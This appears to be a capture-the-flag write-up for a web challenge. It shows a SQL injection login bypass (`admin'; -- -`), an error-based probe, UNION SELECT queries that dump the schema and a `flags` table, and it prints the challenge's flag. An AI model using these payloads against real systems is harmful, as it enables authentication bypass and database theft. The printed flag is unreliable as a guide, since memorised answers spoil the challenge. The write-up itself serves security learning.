The login portal is very easy to bypassing using any standard SQL injection, here's what I used

**USERNAME** `admin'; -- -`

**PASSWORD** `anything`

Once we move into the portal, we are provided with a search bar, which is again vulnerable to SQL injection. You can verify this by giving an invalid SQL query and being presented with a MySQL error (eg: `' AND XXX; -- -`)

Now that we have a search output in a table, it's very easy to populate and extract the entire database schema using `UNION` with `SELECT`.
```sql
' UNION SELECT column_name, 1, 1, 1, 1 FROM information_schema.columns; -- -
```

We can find a table `flags` with `id` and `flag` in it. Use the same query to extract it

```sql
' UNION SELECT id, flag, 1, 1, 1 from flags; -- -
```

## flag
`flag{SQL_1nj3ct10n_w3b_vuln3r4b1l1ty}`